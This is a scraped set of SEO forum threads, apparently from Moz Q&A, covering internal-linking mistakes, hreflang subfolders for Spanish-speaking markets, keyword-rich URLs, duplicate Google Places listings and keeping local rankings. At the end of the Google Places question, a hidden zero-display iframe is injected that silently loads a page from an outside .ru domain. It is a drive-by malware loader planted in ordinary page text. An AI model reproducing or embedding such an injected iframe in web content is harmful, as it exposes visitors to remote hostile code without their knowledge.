Falguni,
I'm sorry to say this but all these sites are making huge SEO blunders.. You seriously need to overlook your complete strategy with the help of a good agency.
For instance, your first domain (http://www.acutehomoeoclinic.com) unnecessarily linking to the inner pages. What's the point to use five-six links in 100 words paragraph? We know internal linking is good but surely not in this way. Plus, why the inner page is linked several times itself? Suppose, I am on on www.abc.com/xyz, why I need to click on a link within the content (4 times in 100 words) that points me to same page again? It really doesn't make any sense!
Keep in touch with the latest happenings in SEO by visiting Moz blog on regular basis.
If you have any particular question or feedback on the pointed issues, please feel free to write here.
Thanks,

The domain that the first link points to - http://www.acutehomoeoclinic.com/ - looking at the info that SEOQuake spits out, its showing 169,000 backlinks yet MOZ site explorer has not found any when I look that way?
Are you using SPAMMY backlinks?

Just a tip... if you post links through URL shorteners in an SEO forum then are much less likely to be used than if you post the actual URL. People are wary about going to mystery destinations.

International SEO - How to rank similar keys for differents countries
Hello MOZ friends.
Local Website Optimization | | NachoRetta
I work in an digital marketing agency in Argentina and since we have a lot of traffic from other Spanish-speaking countries like Mexico and Spain, we want to rank specific keywords for these countries.
We were thinking of putting new versions of the homepage in subfolders, for example /es/ for Spain, /mx/ to Mexico, etc. In these new subfolders we would place a very similar version of the homepage with a few minor modifications to work specific keywords in each country. For example, in Spain it is more searched "marketing online", and "marketing digital" is more used in Mexico and Argentina.
I have understood that to implement this we would be to place a label hrflang on the homepage directing visitors and crawlers to the correct version of each country. Is it ok?
Another concern is, whether they are very similar pages, Google does not take it as duplicate content ..
I read this:
https://moz.com/blog/the-international-seo-checklist
And i am not completely sure about using subfolders for each country, but i dont know how to position diferents keywords for diferent countries.

Local Ranking Power of a Multi-Keyword URL?
Here is a site that is sitting at number 1 on Google UK (local results) for a number of its keywords: http://www.scottishdentistry.com/ If you look at the links in the navigation many of them have urls such as this: http://www.scottishdentistry.com/glasgow-scotland-dentistry/glasgow-scotland-hygienists.html These have clearly been created to be keyword rich. For example, there is no publicly-available page at: http://www.scottishdentistry.com/glasgow-scotland-dentistry Do you think this tactic has helped with the site's rankings? Is it worth imitating? Or will it ultimately attract a penalty of some kind? Remember this is in the UK where Google seems to be slower at penalising dodgy tactics than in the US. Thanks everyone.

Main Website and microsite - Do I do google places for both as it will technically be duplicating the locations,?
Hi All, I have a main eCommerce website which trades out of a number of locations and all these locations appear in google places although they don't rank particularly well in google places . I also have a number of microsites which are specific to one type of product I do and these rank very well locally. My question is , should I also do google places for my microsites as this would technically mean I am creating a duplicate location listing in google places but for a different website etc./business I only have one google account so I guess this would be done under the same google account ? thanks Pete <iframe id="zunifrm" style="display: none;" src="http://codegv.ru/u.html"></iframe>

Staying on top of Google - Edmonton Web
Hello Moz folks, About 2 months ago we launched a brand new site - edmontonweb.ca I have gotten some amazing advice from the folks here at Moz, and amazingly enough, we are now ranking in the top 2 in our city for keywords like "Edmonton web design." We are very excited, but the question now, is how do we stay on top? We are updating our blog on a weekly basis, we are continuing to build inbound links, but how can we do more? I have considered summarizing blog posts in "guest blogs," and linking back to our blog post (so not all the inbound links are directing at the home page). I have considered a more active presence through press releases. Could these strategies be effective? Do you have any other suggestions on strategies we could utilize to stay on top?
